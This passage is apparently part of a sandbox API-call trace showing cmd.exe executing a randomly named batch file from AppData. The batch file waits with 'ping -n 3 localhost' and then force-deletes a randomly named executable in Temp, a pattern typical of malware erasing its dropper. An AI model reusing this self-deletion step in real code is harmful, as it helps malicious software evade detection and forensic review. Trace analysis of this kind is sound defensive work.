lpFilePart=0x22f2e0*="QQZAKkLZ.cmd") returned 0x3a [0100.222] SetErrorMode (uMode=0x0) returned 0x1 [0100.222] CmdBatNotification () returned 0x0 [0100.223] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\QQZAKkLZ.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\qqzakklz.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x22f324, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0100.223] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 3 [0100.223] _get_osfhandle (_FileHandle=3) returned 0x58 [0100.223] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, 
dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.223] _get_osfhandle (_FileHandle=3) returned 0x58 [0100.223] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.223] ReadFile (in: hFile=0x58, lpBuffer=0x4a116640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x22f308, lpOverlapped=0x0 | out: lpBuffer=0x4a116640*, lpNumberOfBytesRead=0x22f308*=0x91, lpOverlapped=0x0) returned 1 [0100.223] SetFilePointer (in: hFile=0x58, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0100.223] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a116640, cbMultiByte=21, lpWideCharStr=0x4a11c640, cchWideChar=8191 | out: lpWideCharStr="ping -n 3 localhost\r\n") returned 21 [0100.224] _get_osfhandle (_FileHandle=3) returned 0x58 [0100.224] GetFileType (hFile=0x58) returned 0x1 [0100.224] _get_osfhandle (_FileHandle=3) returned 0x58 [0100.224] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0100.224] _wcsicmp (_String1="ping", _String2=")") returned 71 [0100.224] _wcsicmp (_String1="FOR", _String2="ping") returned -10 [0100.224] _wcsicmp (_String1="FOR/?", _String2="ping") returned -10 [0100.224] _wcsicmp (_String1="IF", _String2="ping") returned -7 [0100.224] _wcsicmp (_String1="IF/?", _String2="ping") returned -7 [0100.224] _wcsicmp (_String1="REM", _String2="ping") returned 2 [0100.224] _wcsicmp (_String1="REM/?", _String2="ping") returned 2 [0100.226] _tell (_FileHandle=3) returned 21 [0100.226] _close (_FileHandle=3) returned 0 [0100.226] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x22f0dc | out: _Buffer="\r\n") returned 2 [0100.226] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.226] GetFileType (hFile=0x7) returned 0x2 [0100.226] GetStdHandle 
(nStdHandle=0xfffffff5) returned 0x7 [0100.226] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f09c | out: lpMode=0x22f09c) returned 1 [0100.227] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.227] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x22f0c8, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x22f0c8*=0x2) returned 1 [0100.227] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0100.227] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0100.227] _vsnwprintf (in: _Buffer=0x4a115e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x22f0d8 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0100.227] _vsnwprintf (in: _Buffer=0x4a115e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x22f0d8 | out: _Buffer=">") returned 1 [0100.227] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.227] GetFileType (hFile=0x7) returned 0x2 [0100.227] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0100.227] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f0a0 | out: lpMode=0x22f0a0) returned 1 [0100.227] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.227] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a115e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x22f0cc, lpReserved=0x0 | out: lpBuffer=0x4a115e40*, lpNumberOfCharsWritten=0x22f0cc*=0x19) returned 1 [0100.228] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.228] GetFileType (hFile=0x7) returned 0x2 [0100.228] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0100.228] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f324 | out: lpMode=0x22f324) returned 1 [0100.228] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.228] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x320958*, nNumberOfCharsToWrite=0x4, lpNumberOfCharsWritten=0x22f350, lpReserved=0x0 | out: 
lpBuffer=0x320958*, lpNumberOfCharsWritten=0x22f350*=0x4) returned 1 [0100.228] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x22f35c | out: _Buffer=" -n 3 localhost ") returned 16 [0100.228] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.228] GetFileType (hFile=0x7) returned 0x2 [0100.229] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0100.229] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f31c | out: lpMode=0x22f31c) returned 1 [0100.229] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.229] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x22f348, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x22f348*=0x10) returned 1 [0100.229] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x22f37c | out: _Buffer="\r\n") returned 2 [0100.229] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.229] GetFileType (hFile=0x7) returned 0x2 [0100.229] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0100.229] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f33c | out: lpMode=0x22f33c) returned 1 [0100.229] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.229] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x22f368, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x22f368*=0x2) returned 1 [0100.230] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0100.230] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0100.230] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0100.230] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0100.230] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0100.230] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0100.230] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0100.230] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0100.230] 
_wcsicmp (_String1="ping", _String2="REN") returned -2 [0100.230] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0100.230] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0100.230] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0100.230] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0100.230] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0100.230] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0100.230] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0100.230] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0100.230] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0100.230] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0100.230] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0100.230] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0100.230] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0100.230] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0100.230] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0100.230] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0100.230] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0100.230] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0100.230] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0100.230] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0100.230] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0100.230] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0100.230] _wcsicmp (_String1="ping", _String2="START") returned -3 [0100.230] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0100.230] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0100.230] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0100.230] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0100.230] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0100.231] _wcsicmp (_String1="ping", _String2="ASSOC") 
returned 15 [0100.231] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0100.231] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0100.231] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0100.231] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0100.231] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0100.231] SetErrorMode (uMode=0x0) returned 0x0 [0100.231] SetErrorMode (uMode=0x1) returned 0x0 [0100.231] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x330550, lpFilePart=0x22f120 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x22f120*="Desktop") returned 0x18 [0100.231] SetErrorMode (uMode=0x0) returned 0x1 [0100.231] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0100.231] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0100.232] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0100.232] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0100.232] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x22ee9c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ee9c) returned 0xffffffff [0100.232] GetLastError () returned 0x2 [0100.232] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping", fInfoLevelId=0x1, lpFindFileData=0x22ee9c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ee9c) returned 0xffffffff [0100.232] GetLastError () returned 0x2 [0100.232] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0100.232] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x22ee9c, 
fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ee9c) returned 0x330838 [0100.232] FindClose (in: hFindFile=0x330838 | out: hFindFile=0x330838) returned 1 [0100.232] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0x22ee9c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ee9c) returned 0xffffffff [0100.233] GetLastError () returned 0x2 [0100.233] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0x22ee9c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ee9c) returned 0x330838 [0100.233] FindClose (in: hFindFile=0x330838 | out: hFindFile=0x330838) returned 1 [0100.233] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0100.233] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0100.233] GetConsoleTitleW (in: lpConsoleTitle=0x22eeec, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0100.233] SetErrorMode (uMode=0x0) returned 0x0 [0100.233] SetErrorMode (uMode=0x1) returned 0x0 [0100.233] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x330a98, lpFilePart=0x22ea0c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x22ea0c*="Desktop") returned 0x18 [0100.233] SetErrorMode (uMode=0x0) returned 0x1 [0100.233] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0100.233] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0100.233] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0100.233] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0100.233] FindFirstFileExW (in: 
lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x22e788, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22e788) returned 0xffffffff [0100.234] GetLastError () returned 0x2 [0100.234] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping", fInfoLevelId=0x1, lpFindFileData=0x22e788, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22e788) returned 0xffffffff [0100.234] GetLastError () returned 0x2 [0100.234] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0100.234] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x22e788, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22e788) returned 0x330d80 [0100.234] FindClose (in: hFindFile=0x330d80 | out: hFindFile=0x330d80) returned 1 [0100.234] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0x22e788, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22e788) returned 0xffffffff [0100.234] GetLastError () returned 0x2 [0100.234] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0x22e788, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22e788) returned 0x330d80 [0100.234] FindClose (in: hFindFile=0x330d80 | out: hFindFile=0x330d80) returned 1 [0100.234] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0100.234] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0100.234] GetConsoleTitleW (in: lpConsoleTitle=0x22ec80, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0100.234] InitializeProcThreadAttributeList (in: lpAttributeList=0x22eb08, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x22ebd0 | out: lpAttributeList=0x22eb08, lpSize=0x22ebd0) returned 1 [0100.235] UpdateProcThreadAttribute (in: lpAttributeList=0x22eb08, 
dwFlags=0x0, Attribute=0x60001, lpValue=0x22ebc8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x22eb08, lpPreviousValue=0x0) returned 1 [0100.235] GetStartupInfoW (in: lpStartupInfo=0x22eac4 | out: lpStartupInfo=0x22eac4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0100.235] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0100.236] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping -n 3 localhost", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x22eb64*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping -n 3 localhost", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x22ebb0 | out: lpCommandLine="ping -n 3 localhost", lpProcessInformation=0x22ebb0*(hProcess=0x54, hThread=0x58, dwProcessId=0xc38, dwThreadId=0xc3c)) returned 1 [0100.347] CloseHandle (hObject=0x58) returned 1 [0100.347] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0100.347] GetEnvironmentStringsW () returned 0x320970* [0100.347] FreeEnvironmentStringsW (penv=0x320970) returned 1 [0100.347] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0104.281] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x22eaa4 | out: lpExitCode=0x22eaa4*=0x0) returned 1 [0104.281] CloseHandle (hObject=0x54) returned 1 [0104.281] _vsnwprintf (in: _Buffer=0x22ebec, 
_BufferCount=0x13, _Format="%08X", _ArgList=0x22eab0 | out: _Buffer="00000000") returned 8 [0104.281] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0104.281] GetEnvironmentStringsW () returned 0x322c28* [0104.281] FreeEnvironmentStringsW (penv=0x322c28) returned 1 [0104.281] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0104.281] GetEnvironmentStringsW () returned 0x322c28* [0104.281] FreeEnvironmentStringsW (penv=0x322c28) returned 1 [0104.281] DeleteProcThreadAttributeList (in: lpAttributeList=0x22eb08 | out: lpAttributeList=0x22eb08) [0104.281] _get_osfhandle (_FileHandle=1) returned 0x7 [0104.282] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0104.282] _get_osfhandle (_FileHandle=1) returned 0x7 [0104.282] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1141ac | out: lpMode=0x4a1141ac) returned 1 [0104.282] _get_osfhandle (_FileHandle=0) returned 0x3 [0104.282] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1141b0 | out: lpMode=0x4a1141b0) returned 1 [0104.282] SetConsoleInputExeNameW () returned 0x1 [0104.282] GetConsoleOutputCP () returned 0x1b5 [0104.282] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0104.282] SetThreadUILanguage (LangId=0x0) returned 0x409 [0104.282] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\QQZAKkLZ.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\qqzakklz.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x22f324, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0104.282] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0104.282] _get_osfhandle (_FileHandle=3) returned 0x54 [0104.282] SetFilePointer (in: hFile=0x54, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0104.283] _get_osfhandle (_FileHandle=3) returned 0x54 
[0104.283] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0104.283] ReadFile (in: hFile=0x54, lpBuffer=0x4a116640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x22f308, lpOverlapped=0x0 | out: lpBuffer=0x4a116640*, lpNumberOfBytesRead=0x22f308*=0x7c, lpOverlapped=0x0) returned 1 [0104.284] SetFilePointer (in: hFile=0x54, lDistanceToMove=83, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0104.284] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a116640, cbMultiByte=62, lpWideCharStr=0x4a11c640, cchWideChar=8191 | out: lpWideCharStr="del /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\"\r\n") returned 62 [0104.284] _get_osfhandle (_FileHandle=3) returned 0x54 [0104.284] GetFileType (hFile=0x54) returned 0x1 [0104.284] _get_osfhandle (_FileHandle=3) returned 0x54 [0104.284] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0104.285] _tell (_FileHandle=3) returned 83 [0104.285] _close (_FileHandle=3) returned 0 [0104.285] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x22f0dc | out: _Buffer="\r\n") returned 2 [0104.285] _get_osfhandle (_FileHandle=1) returned 0x7 [0104.285] GetFileType (hFile=0x7) returned 0x2 [0104.286] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0104.286] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f09c | out: lpMode=0x22f09c) returned 1 [0104.286] _get_osfhandle (_FileHandle=1) returned 0x7 [0104.286] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x22f0c8, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x22f0c8*=0x2) returned 1 [0104.286] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="$P$G") 
returned 0x4 [0104.286] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0104.286] _vsnwprintf (in: _Buffer=0x4a115e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x22f0d8 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0104.286] _vsnwprintf (in: _Buffer=0x4a115e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x22f0d8 | out: _Buffer=">") returned 1 [0104.286] _get_osfhandle (_FileHandle=1) returned 0x7 [0104.286] GetFileType (hFile=0x7) returned 0x2 [0104.286] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0104.286] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f0a0 | out: lpMode=0x22f0a0) returned 1 [0104.286] _get_osfhandle (_FileHandle=1) returned 0x7 [0104.286] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a115e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x22f0cc, lpReserved=0x0 | out: lpBuffer=0x4a115e40*, lpNumberOfCharsWritten=0x22f0cc*=0x19) returned 1 [0104.287] _get_osfhandle (_FileHandle=1) returned 0x7 [0104.287] GetFileType (hFile=0x7) returned 0x2 [0104.287] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0104.287] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f324 | out: lpMode=0x22f324) returned 1 [0104.287] _get_osfhandle (_FileHandle=1) returned 0x7 [0104.287] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x32f008*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x22f350, lpReserved=0x0 | out: lpBuffer=0x32f008*, lpNumberOfCharsWritten=0x22f350*=0x3) returned 1 [0104.287] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x22f35c | out: _Buffer=" /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" ") returned 58 [0104.287] _get_osfhandle (_FileHandle=1) returned 0x7 [0104.287] GetFileType (hFile=0x7) returned 0x2 [0104.287] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0104.287] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f31c | out: lpMode=0x22f31c) returned 1 
[0104.287] _get_osfhandle (_FileHandle=1) returned 0x7 [0104.287] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x3a, lpNumberOfCharsWritten=0x22f348, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x22f348*=0x3a) returned 1 [0104.288] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x22f37c | out: _Buffer="\r\n") returned 2 [0104.288] _get_osfhandle (_FileHandle=1) returned 0x7 [0104.288] GetFileType (hFile=0x7) returned 0x2 [0104.288] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0104.288] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f33c | out: lpMode=0x22f33c) returned 1 [0104.288] _get_osfhandle (_FileHandle=1) returned 0x7 [0104.288] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x22f368, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x22f368*=0x2) returned 1 [0104.288] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0104.288] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0104.288] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0104.288] GetConsoleTitleW (in: lpConsoleTitle=0x22eeec, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0104.288] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x22eca4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0104.288] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x22dd34 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0104.288] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x22df64, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x22df68, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x22df64*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0104.289] 
_wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0104.289] _wcsicmp (_String1="yAQb5Zg8.exe", _String2=".") returned 75 [0104.289] _wcsicmp (_String1="yAQb5Zg8.exe", _String2="..") returned 75 [0104.289] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\yaqb5zg8.exe")) returned 0x2020 [0104.289] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x322148 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0104.289] SetErrorMode (uMode=0x0) returned 0x0 [0104.289] SetErrorMode (uMode=0x1) returned 0x0 [0104.289] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe", nBufferLength=0x104, lpBuffer=0x22e388, lpFilePart=0x22e370 | out: 